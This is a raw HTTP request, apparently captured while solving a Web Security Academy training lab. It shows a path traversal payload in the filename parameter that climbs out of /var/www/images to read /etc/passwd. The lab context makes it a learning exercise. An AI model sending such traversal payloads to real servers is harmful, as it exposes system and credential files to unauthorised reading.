GET /image?filename=/var/www/images/../../../etc/passwd HTTP/1.1
Host: ac1f1f8c1ea9e350809d269500d100e7.web-security-academy.net
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: image/avif,image/webp,image/apng,image/,/*;q=0.8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: image
Referer: https://ac1f1f8c1ea9e350809d269500d100e7.web-security-academy.net/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: session=HRbXfLyIetQL88zyBJ2k2aUe3aNFtglY